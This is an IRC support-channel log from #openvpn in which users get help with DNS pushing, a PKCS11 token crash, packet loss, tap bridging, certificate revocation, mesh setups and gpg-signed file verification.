01:49 < Minnebo> where can I set those things?
01:49 < Minnebo> !dns
01:49 < Minnebo> :D
01:49 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns
01:49 < Minnebo> !pushdns
01:49 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also
01:49 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7
01:50 <+pekster> DNS on windows is kind of a PITA: maybe that --register-DNS option will help, but I spent many hours at one of my prior jobs cooking up a solution to guarantee that internal DNS worked. I just wish my solution wasn't locked up in a former employer's SVN repo :(
01:51 <+pekster> Windows does strange things when multi-homed, especially if you require automatic suffix support (which you apparently do since you're not using a FQDN)
01:51 < Minnebo> pekster, i could trick it
01:51 < Minnebo> by adjusting the hosts file
01:51 <+pekster> Using a FQDN might help, if you push the domain along with the DNS server
01:51 <+pekster> \\server.your.domain
01:52 < Minnebo> but then again when I go to 192.168.100.1 it goes to my local address
01:52 <+pekster> It's still ugly because the DNS servers and "search suffix" for the domain are attached to the adapter, not system-wide
01:52 < Minnebo> It's odd that pptp vpn doesn't have these issues :p
01:52 <+pekster> It just has issues with being a known insecure protocol for over a decade and being fairly trivial to attack since mid 2012
01:53 < Minnebo> i'll test some this afternoon, have to hit the road
01:53 < Minnebo> laters
01:56 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
01:57 -!- Azrael808 [~peter@212.161.9.162] has quit [Remote host closed the connection]
01:59 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Ping timeout: 246 seconds]
01:59 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
01:59 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection]
01:59 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
02:05 -!- Azrael808 [~peter@212.161.9.162] has quit [Quit: Ex-Chat]
02:15 -!- Halagan [~Miranda@a4.evona.ba.cust.gts.sk] has joined #openvpn
02:16 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 264 seconds]
02:16 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn
02:21 < Halagan> Hi guys .. We installed the latest version of iKey1000SDK (4.2.0) for iKey 1032 under OS Windows 7 x64.
02:21 < Halagan> The app installed correctly and the utility shows some information about the token.
02:21 < Halagan> We have an openvpn certificate on this iKey and we use this certificate to log in to the vpn site.
02:21 < Halagan> When we run the openvpn client, an error appears with the message “the ordinal 322 could not be located in the dynamic link library libeay32.dll”. So I copied this file and the file ssleay32.dll from windows\system32 to openvpn\bin, where I replaced the original openvpn files. Then I started the openvpn client again, and the openvpn daemon crashed with an error (the file with this error is in the attachment). We use openvpn-2.2.2-install.exe, but I have also tried the new version openvpn-install-2.3.0.exe with the same results. Under OS Windows XP 32 bit with iKey1000SDK (4.0.0.4) this certificate on the token runs without problems.
02:24 < Halagan> And this is the attachment error: Faulting application name: openvpn.exe, version: 2.3.0.0, time stamp: 0x5098c6eb
02:24 < Halagan> Faulting module name: openvpn.exe, version: 2.3.0.0, time stamp: 0x5098c6eb
02:24 < Halagan> Exception code: 0xc0000005
02:24 < Halagan> Fault offset: 0x00075b73
02:24 < Halagan> Faulting process id: 0xafc
02:24 < Halagan> Faulting application start time: 0x01cdd6c4db23e169
02:24 < Halagan> Faulting application path: C:\Program Files (x86)\OpenVPN\bin\openvpn.exe
02:24 < Halagan> Faulting module path: C:\Program Files (x86)\OpenVPN\bin\openvpn.exe
02:24 < Halagan> Report Id: 1a456b8b-42b8-11e2-85e2-ac7289579a3a
02:30 < blackmagic> Please use a pastebin for pastes longer than 4 lines.
02:31 < blackmagic> makes reading much easier.
02:31 -!- Guest70136 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn
02:42 < Halagan> Okay .. here is the pastebin link .. http://pastebin.com/fhUQfMwE
02:43 < Halagan> And i also tried the new version 2.3.0 of OpenVPN ..
02:50 -!- cosmicgate [~root@216.17.109.26] has quit []
02:56 < Halagan> Please suggest a solution.
02:57 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn
02:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds]
03:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
03:15 -!- swat [~swat@ubuntu/member/swat] has quit [Ping timeout: 255 seconds]
03:19 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
03:22 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in]
03:24 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
03:26 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
03:26 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn
03:34 -!- s51itxsyc [~s51itxsyc@202.108.130.138] has quit [Quit: Lost terminal]
03:49 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has quit [Ping timeout: 260 seconds]
03:56 -!- APTX [~APTX@unaffiliated/aptx] has quit [Read error: Operation timed out]
03:56 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn
04:04 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has quit [Ping timeout: 248 seconds]
04:11 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 248 seconds]
04:12 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
04:12 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has joined #openvpn
04:20 -!- igor__ [~igor@pd907e599.dip0.t-ipconnect.de] has joined #openvpn
04:27 -!- eugenmayer1 [~EugenMaye@2a02:8071:b258:c001:ec3e:a40d:77ad:6be2] has joined #openvpn
04:28 < eugenmayer1> Hello. I'm having like 40 VPN clients in 4 OpenVPN nets (all served by one server). Two locations, one new office (all clients there, all OSX) and a customer location, have huge bandwidth issues (download 30kbit/s). The networks are based on UDP and it seems it could be due to packet loss. Any suggestion?
04:29 < eugenmayer1> I used iperf with -u and got a packet loss of 7-10% to the vpn server (from the outer net, not the tunnel)
04:33 <+pekster> eugenmayer1: That's a significant amount of packet loss; if you're familiar with TCP's restart mechanism in the face of lost packets, that could easily account for your low throughput. It's possible window tuning could help with TCP streams, but that still won't change the fundamental problem around that bad of a network link
04:34 < eugenmayer1> pekster: so you suggest, as I do, it's an ISP issue?
04:34 -!- p3rror [~mezgani@2001:0:53aa:64c:281c:646c:d605:16f1] has joined #openvpn
04:34 < eugenmayer1> pekster: as it's UDP, how could it be due to TCP's restart mechanism?
04:35 <+pekster> TCP is still used inside the tunnel for anything TCP-based
04:35 < eugenmayer1> I mean, since UDP is stateless and has no "ACK" it's always very sensitive to bad connection/packet loss
04:35 < eugenmayer1> right?
04:36 <+pekster> Right. But if you, say, ftp across the VPN link, the local system doesn't care "why" the packet was lost (ie: no ack comes back for it) so it re-tries
04:36 <+pekster> That in turn generates another UDP packet, that in your case is also 7-10% likely to be lost
04:36 < eugenmayer1> yeah sure. Combined, that will give bandwidth issues, that's clear
04:36 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
04:37 <+pekster> Try a traceroute tool that can show you loss/latency for each hop between your endpoints (I like the "mtr" tool for this, but there are others) and see what you find
04:37 <+pekster> At ~10% latency, you clearly have a problem with the link
04:37 <+pekster> loss, rather
04:38 < eugenmayer1> pekster: so I guess, since my VPN server is virtualized, I have to double check it's nothing on that route, check a different server. If I face the same amount of packet loss on other servers, I guess it's ISP-only, right
04:38 < eugenmayer1> pekster: using MTR here
04:39 <+pekster> "nothing on the route" ? I've no clue what that means, but I don't get packet loss even when someone on my network is watching Netflix and another is uploading vacation photos
04:39 < eugenmayer1> I see, right now, a kernel syslog message
04:39 < eugenmayer1> UDP: short packet: From XXXXX to XXXX
04:40 < eugenmayer1> and something like __ratelimit: 11 callbacks suppressed..
04:40 < eugenmayer1> pekster: I meant, rather, e.g. something with the virtualized network interface
04:45 -!- eugenmayer [~EugenMaye@2a02:8071:b258:c001:5dcf:eb91:45:15e3] has joined #openvpn
04:49 -!- eugenmayer1 [~EugenMaye@2a02:8071:b258:c001:ec3e:a40d:77ad:6be2] has quit [Ping timeout: 256 seconds]
04:49 -!- b1rkh0ff [~b1rkh0ff@178.77.7.250] has joined #openvpn
04:49 < eugenmayer> pekster: I am having huge internet issues, sorry. I am using MTR for this kind of tests
04:53 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 244 seconds]
04:56 <+pekster> eugenmayer: Right. I mean, if you can't even stay connected to IRC without dropping, that's going to impact almost any application that's sending data across the Internet
04:56 <+pekster> The VPN's job is to encapsulate and deliver packets to your peer, not to fix that kind of problem
04:56 -!- eugenmayer [~EugenMaye@2a02:8071:b258:c001:5dcf:eb91:45:15e3] has quit [Ping timeout: 256 seconds]
04:56 <+pekster> lol
05:01 -!- thinkHell [~Hell@85.15.47.27] has quit [Read error: Connection reset by peer]
05:04 -!- eugenmayer [~EugenMaye@2a02:8071:b258:c001:657e:9c95:55ed:79ce] has joined #openvpn
05:05 <+pekster> eugenmayer: https://pastee.org/ksz9t
05:05 < eugenmayer> Sorry for my connection, it's just going up and down.. I guess I missed like anything? ;/
05:06 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn
05:18 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
05:22 -!- APTX [~APTX@unaffiliated/aptx] has quit [Ping timeout: 248 seconds]
05:22 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
05:23 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
05:23 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
05:24 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
05:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
05:31 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
05:33 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
05:34 -!- b1rkh0ff [~b1rkh0ff@178.77.7.250] has quit [Quit: Leaving]
05:36 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
05:39 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
05:44 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
05:51 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn
05:56 -!- eugenmayer [~EugenMaye@2a02:8071:b258:c001:657e:9c95:55ed:79ce] has quit [Ping timeout: 256 seconds]
06:03 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has quit [Quit: valparaiso]
06:03 -!- dude123 [~jonathan@cpe-72-191-141-216.stx.res.rr.com] has joined #openvpn
06:03 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn
06:04 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn
06:04 < dude123> !welcome
06:04 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
06:04 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
06:06 < dude123> question - does openvpn "hide" the user's ip address while on the internet?
06:07 < plaisthos> same as other vpn
06:07 <+pekster> You probably want to see the !redirect output from the bot. You can adjust the default gateway for traffic you don't have a more specific routing entry for, although that's only used while the VPN is connected
06:08 < dude123> !redirect
06:08 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
06:08 <@vpnHelper> http://ircpimps.org/redirect.png
06:13 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has left #openvpn []
06:13 -!- dude123 [~jonathan@cpe-72-191-141-216.stx.res.rr.com] has quit [Quit: Leaving]
06:21 -!- p3rror [~mezgani@2001:0:53aa:64c:281c:646c:d605:16f1] has quit [Remote host closed the connection]
06:23 -!- p3rror [~mezgani@2001:0:53aa:64c:281c:646c:d605:16f1] has joined #openvpn
06:24 -!- ihptru [~ihptru@164.138.25.4] has quit [Ping timeout: 276 seconds]
06:37 -!- mattock is now known as mattock_afk
06:37 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
06:50 -!- p3rror [~mezgani@2001:0:53aa:64c:281c:646c:d605:16f1] has quit [Ping timeout: 260 seconds]
06:58 < Halagan> Hi guys, can you please help me with this error ? .. http://pastebin.com/QsLpA6zy
07:00 < dioz> pekster
07:11 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has joined #openvpn
07:13 <+pekster> dioz: sup?
07:19 -!- mattock_afk is now known as mattock
07:21 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 260 seconds]
07:23 <+pekster> Halagan: I really don't have much more info for you as I don't work with PKCS11 myself very often. As I mentioned a number of days ago when you last asked, your pkcs11 provider appears to need features not present in the standard openssl build that OpenVPN provides
07:24 <+pekster> You either need to figure out what change needs to happen and build it yourself, or rebuild OpenVPN against the modified OpenSSL library
07:25 < dioz> I know server-bridge by itself is for dhcp
07:25 <+pekster> I'm not the guy to ask to debug software I haven't used and don't have the source to. The error message you get is very generic, and the fact that openvpn crashes with a different dll is not a surprise; you can't just swap out compiled shared-object files like that; you need to rebuild them from *source* for this to work
07:29 < dioz> if I'm making a tap0 bridge server-bridge nogw
07:29 < dioz> `client' is windows 7
07:29 < dioz> how do I get the client to get my bridge side WAN address
07:29 < dioz> if that makes sense
07:29 < dioz> ip-forwarding is enabled
07:30 < dioz> the WAN side address is static (no dhcp)
07:30 <+pekster> huh?
07:30 -!- folivora_ is now known as folivora
07:31 <+pekster> You want your VPN client to get, from dhcp, an address assigned to your upstream device? You can't do that...
07:31 < dioz> yeah, vps in another AS has multiple ip addresses
07:32 < dioz> I want those ip addresses routed to machines I have in a lan
07:32 < dioz> `routed' for lack of a better term
07:32 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn
07:33 < dioz> or am I high on crack or something?
07:33 <+pekster> Then bridge a tap device on the system that is assigned those addresses
07:33 < dioz> yeah I have brctl addif br0 eth0 tap0
07:34 < dioz> tap0 is made by the openvpn.config (right now I have to manually brctl addif br0 eth0 tap0 after openvpn runs for them to `show' as bridged)
07:35 <+pekster> Okay. Nothing wrong with that, but if you don't use DHCP you'll need to statically set the IP on your clients, as well as your gateway if you plan to route through that interface
07:37 <+pekster> The client won't "get" your br0 address, but the device will be on the same L2 network
07:37 <+pekster> ie: your client still needs its *own* address to do anything useful
07:38 < dioz> so... idkf about windows, but I saw on install that it added a TAP-Win32 device to my "Control Panel > Networking and Sharing > Networking connections"
07:38 < dioz> should I see that "connect"?
07:38 <+pekster> Yup, and it needs an IP to do anything interesting
07:39 <+pekster> You can manage that by DHCP, but if you don't have it you need to assign it an IP, perhaps with an 'ifconfig' locally on the client side, or 'ifconfig-push' server-side
07:39 <+pekster> Same for a gateway, and DNS if you need it
07:39 <+pekster> Think of tap like an ethernet cable; you can't just plug a cable in, but you need to somehow give your device an IP so it can use the connection
07:40 < dioz> one last thing... does "Local Area Connection 2" sound like a reasonable `dev-node' for a client side windows 7 config?
07:40 <+pekster> Yup
07:40 -!- ade_b [~Ade@95.209.55.220.bredband.tre.se] has joined #openvpn
07:40 -!- ade_b [~Ade@95.209.55.220.bredband.tre.se] has quit [Changing host]
07:40 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
07:40 <+pekster> You can also rename it to "tap0" or "vpn0" or whatever you like
07:40 <+pekster> Windows has stupid device names ;)
07:41 < dioz> alright thanks
07:47 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has quit [Ping timeout: 264 seconds]
07:54 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn
07:58 -!- dazo_afk is now known as dazo
08:03 <@ecrist> good morning, kids
08:11 < igor__> can I ask a tun/tap related question?
08:11 <@ecrist> !ask
08:11 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc
08:12 < igor__> do I have to use tap for ifenslave
08:16 < plaisthos> like with any other ethernet device
08:17 < igor__> ok I am a beginner
08:17 <@ecrist> what is ifenslave?
08:17 < igor__> bonding
08:18 < igor__> I want to use bonding and openvpn
08:19 <+pekster> igor__: You need tap then; the ifenslave manpage is very specific that it works on the Ethernet level, which is what tap is. tun is at the Network (L3) layer
08:20 < igor__> so I have to use ethernet-bridge
08:43 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit []
08:59 -!- brute11k1 [~brute11k@89.249.235.236] has joined #openvpn
09:00 -!- zeeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
09:00 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn
09:02 -!- pnielsen_ [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn
09:03 -!- nand` [~nand@static.102.126.46.78.clients.your-server.de] has joined #openvpn
09:03 -!- igor___ [~igor@pd907e599.dip0.t-ipconnect.de] has joined #openvpn
09:03 -!- Fiouz [~Fiouz@2a01:e0b:1:68:240:63ff:fee6:924b] has quit [Disconnected by services]
09:03 -!- Fiouz_ [~Fiouz@2a01:e0b:1:68:240:63ff:fee6:924b] has joined #openvpn
09:06 -!- Thermi_ [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn
09:06 -!- [fred]_ [fred@konfuzi.us] has joined #openvpn
09:06 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn
09:07 -!- Netsplit *.net <-> *.split quits: igor__, pnielsen, Guest70136, nutron, mnathani, [fred], Thermi, swiftkey, `nand`, kirin`, (+4 more, use /NETSPLIT to show all of them)
09:08 -!- pnielsen_ is now known as pnielsen
09:08 -!- Netsplit over, joins: BtbN
09:10 -!- defswork [~andy@141.0.50.105] has joined #openvpn
09:10 -!- swiftkey [swiftkey@2a01:7e00::f03c:91ff:feae:714e] has joined #openvpn
09:11 -!- swiftkey [swiftkey@2a01:7e00::f03c:91ff:feae:714e] has quit [Changing host]
09:11 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn
09:11 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn
09:11 -!- Netsplit *.net <-> *.split quits: swiftkey
09:11 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
09:12 -!- Netsplit over, joins: swiftkey
09:15 -!- kirin` [telex@gateway/shell/anapnea.net/x-ilsmwstpkjvdgbnu] has joined #openvpn
09:20 -!- kirin` [telex@gateway/shell/anapnea.net/x-ilsmwstpkjvdgbnu] has quit [Ping timeout: 240 seconds]
09:22 -!- NChief [tomme@unaffiliated/nchief] has quit [Quit: leaving]
09:22 -!- kirin` [telex@gateway/shell/anapnea.net/x-elbljsabsqbscuxz] has joined #openvpn
09:22 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn
09:24 -!- NChief [tomme@unaffiliated/nchief] has quit [Client Quit]
09:25 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn
09:26 -!- mndo [~mndo@bl15-215-4.dsl.telepac.pt] has joined #openvpn
09:28 -!- kirin` [telex@gateway/shell/anapnea.net/x-elbljsabsqbscuxz] has quit [Ping timeout: 252 seconds]
09:28 < mndo> hi
09:28 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn
09:29 -!- kirin` [telex@gateway/shell/anapnea.net/x-eflzkseusdanowsk] has joined #openvpn
09:29 < mndo> is it possible to revoke several clients using crl-verify crl.pem ?
09:31 -!- Assid [~kvirc@unaffiliated/assid] has joined #openvpn
09:34 -!- kirin` [telex@gateway/shell/anapnea.net/x-eflzkseusdanowsk] has quit [Ping timeout: 248 seconds]
09:36 -!- kirin` [telex@gateway/shell/anapnea.net/x-jtuxtqhqsbqanuqk] has joined #openvpn
09:40 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn
09:40 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host]
09:40 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
09:41 -!- kirin` [telex@gateway/shell/anapnea.net/x-jtuxtqhqsbqanuqk] has quit [Ping timeout: 255 seconds]
09:42 -!- kirin` [telex@gateway/shell/anapnea.net/x-vloxwmtujngywbmh] has joined #openvpn
09:44 < mndo> hi, is it possible to revoke several clients?
09:45 -!- igor___ [~igor@pd907e599.dip0.t-ipconnect.de] has quit [Quit: Lost terminal]
09:47 -!- kirin` [telex@gateway/shell/anapnea.net/x-vloxwmtujngywbmh] has quit [Ping timeout: 264 seconds]
09:49 -!- kirin` [telex@gateway/shell/anapnea.net/x-pkcemxmoxnqxpyji] has joined #openvpn
09:49 < gladiatr> if you are using certificates and your server has access to your CA crl...
09:51 <+pekster> mndo: Certificate revocation can be performed the traditional way by revoking from your PKI (easy-rsa has a "revoke-full" script, or use another method if you manage your own PKI.) Optionally, you can "temporarily" disable a user based on CN by using a ccd file with the "disable" directive in that file
09:52 <+pekster> The ccd method, or an equivalent via a --connect script, should be a temporary solution only where the certificate may later be re-authorized or similar. If the key material has been compromised, you should properly revoke the certificate and update the CRL
09:53 < mndo> pekster, is the file crl.pem used on crl-verify updated with all the revoked clients every time it is generated by revoke-full?
09:54 -!- kirin` [telex@gateway/shell/anapnea.net/x-pkcemxmoxnqxpyji] has quit [Ping timeout: 248 seconds]
09:54 <+pekster> mndo: Yup. So copy that crl.pem file to your server and it'll pick up on the change (provided you're already using the --verify-crl option. If not, you'd need to restart the instance to add that directive)
09:55 -!- kirin` [telex@gateway/shell/anapnea.net/x-inomorqwzrpnrdqv] has joined #openvpn
09:56 <+pekster> Technically you can do silly things like manually hack your index.txt file to "un-revoke" a certificate, but you really shouldn't do that as revocation is not supposed to be an operation you can undo
09:56 < mndo> pekster, oh, good, my doubt was related to the crl.pem contents..
09:56 <+pekster> You can dump the crl manually if you want to see all the serial numbers you've revoked
09:57 <+pekster> The CRL is basically just a list of all revoked certs by serial, CA association, and the date/time of each revocation along with a signature from the CA
09:57 < gladiatr> you can cross-reference the serial of the target cert between the CA's index file and the contents of the crl
09:57 < gladiatr> oh. yeah. what pekster said :)
09:58 -!- PlasmaHH [~plasmahh@213.61.9.75] has joined #openvpn
09:59 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
10:00 < mndo> pekster, great, thank you for your help
10:00 < PlasmaHH> hi, I just set up some openvpn, and while both computers can ping each other just fine on their tun0 interface, when I try to ping a host from the client's subnet, using ping on the server, I can see how over the vpn some encrypted data is sent to the client, but nothing arrives on the tun0 there. Where would I start debugging this?
10:00 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
10:01 -!- kirin` [telex@gateway/shell/anapnea.net/x-inomorqwzrpnrdqv] has quit [Ping timeout: 246 seconds]
10:03 -!- kirin` [telex@gateway/shell/anapnea.net/x-ejkvabzbfigdmmch] has joined #openvpn
10:03 <+pekster> !clientlan
10:03 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
10:03 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
10:04 -!- Eduard_Munteanu [~Eduard_Mu@188.25.7.99] has joined #openvpn
10:05 < Eduard_Munteanu> Hi. Is there any support for mesh/p2p VPNs in openvpn? Or some patch / some other project I should look at?
10:06 <+pekster> Eduard_Munteanu: No mesh support at present (where you have a many to many configuration.) You can do PtP-style VPNs on OSs that support it though
10:07 <+pekster> There was some project that basically automated the creation of a bunch of PtP tunnels to emulate a mesh design, although I'm forgetting what that was called now
10:07 < Eduard_Munteanu> pekster: well, that's a lot of tunnels for 25-30 machines :)
10:08 <+pekster> Sure, although if they're mostly idle the resource requirements would be somewhat low (just ugly as far as 30 tun devices went...)
10:08 <+pekster> !mesh
10:08 <@vpnHelper> "mesh" is (#1) openvpn does not do mesh networking or (#2) see !rip or (#3) check out http://github.com/darkpixel/openmesher/ for auto-creating openvpn meshes
10:08 < mndo> pekster, maybe peervpn?
10:08 -!- kirin` [telex@gateway/shell/anapnea.net/x-ejkvabzbfigdmmch] has quit [Ping timeout: 276 seconds]
10:08 < Eduard_Munteanu> I was just looking at peervpn, though it seems it's shared-key.
10:08 <+pekster> It would be cool to have a 'mesh' topology where an extra field is added to encrypted data to handle >1 peer
10:10 -!- kirin` [telex@gateway/shell/anapnea.net/x-hannadrtnndmmtdm] has joined #openvpn
10:11 < Eduard_Munteanu> Grr, openmesher also seems shared key-only.
10:11 < Eduard_Munteanu> !rip
10:11 <@vpnHelper> "rip" is http://www.secure-computing.net/wiki/index.php/OpenVPN/RIPRouting for a writeup on using RIP in openvpn
10:13 <+pekster> Eduard_Munteanu: I'm somewhat curious what your usecase is where you need a true mesh of ~30 nodes; at 870 "direct" links, that's quite the setup
10:14 <+pekster> I'm not downplaying the usefulness of a mesh for such setups, just interested to know what types of projects folks are considering using them for
10:15 < Eduard_Munteanu> pekster: I'm using bittorrent to distribute files from a central server (unreliable bandwidth) to 30 machines, and I figured delegating encryption and security to openvpn might be a good idea.
10:15 -!- kirin` [telex@gateway/shell/anapnea.net/x-hannadrtnndmmtdm] has quit [Ping timeout: 252 seconds]
10:16 < Eduard_Munteanu> Especially since I already run a PKI for other purposes.
10:16 <+pekster> Interesting, so you'd like the guaranteed authenticity in such a setup, where presumably access to the tracker and network gives proof of identity
10:16 -!- kirin` [telex@gateway/shell/anapnea.net/x-mudnmykgtjucinir] has joined #openvpn
10:17 <+pekster> I wonder if using gpg at each end and letting bittorrent do its thing would be a simpler solution in terms of setup and maintenance if you really require encryption and/or proof-of-origin
10:19 < Eduard_Munteanu> pekster: well, currently I am transferring the torrent files through rsync/ssh... I figured this might simplify security, if only openvpn supported it out of the box.
10:20 < Eduard_Munteanu> I could simply run an rsync server on that (TAP ?) interface, and pretend everything is alright.
10:20 <+pekster> No need for tap unless you're dealing with an Ethernet-level protocol (ARP, IPX, multicast, etc)
10:20 < Eduard_Munteanu> I wonder what it takes to implement it, though, I should have a look.
10:21 <+pekster> rsync is still one-to-one in terms of connectivity
10:21 <+pekster> Bittorrent is helpful in a distributed sense, and you're of course free to prepare a .torrent that shares a signed or encrypted gpg file between peers, then each client of your central server just decrypts it after download is complete
10:22 -!- kirin` [telex@gateway/shell/anapnea.net/x-mudnmykgtjucinir] has quit [Read error: Connection reset by peer]
10:22 -!- master_of_master [~master_of@p57B55DD0.dip.t-dialin.net] has quit [Ping timeout: 272 seconds]
10:23 < Eduard_Munteanu> Hm, yes, I guess that works too. I've also looked at some builtin encryption in rtorrent, but dunno how the key exchange actually works :/
10:23 <+pekster> If you just need proof that the file hasn't been tampered with between the central server and your nodes, a detached signature is a far cleaner option so you don't even need to decrypt anything
10:23 < Eduard_Munteanu> Oh, definitely. In fact, I guess the torrent files are ok for that purpose, no?
10:23 -!- master_of_master [~master_of@p57B55F39.dip.t-dialin.net] has joined #openvpn
10:24 * Eduard_Munteanu looks what hashes they use
10:24 <+pekster> Well, what is it you want at a high level? Do you just need to verify the file as the same on download as it was from the source? If so, gpg detached signatures are definitely what you want (and what Linux distros using torrents today already use)
10:25 < Eduard_Munteanu> Hm, SHA-1 according to wikipedia, looks reasonably fine. The files are just movies, btw.
10:25 <+pekster> eg: look at this link, where the checksums are signed: http://cdimage.ubuntu.com/xubuntu/releases/12.10/release/
10:25 <@vpnHelper> Title: Xubuntu 12.10 (Quantal Quetzal) (at cdimage.ubuntu.com)
10:25 -!- kirin` [telex@gateway/shell/anapnea.net/x-wbhuhodavdvolbuq] has joined #openvpn
10:25 <+pekster> So you download the content in the "clear" (possibly with bittorrent's rc4 "encryption" if you call it that between peers) and then checksum it, then verify that the checksums file was authentic by verifying the gpg signature
10:26 <+pekster> If your checksums match and the checksum file was correctly signed with a signature you trust, you know it hasn't been tampered with since it was hashed/signed at the server's end
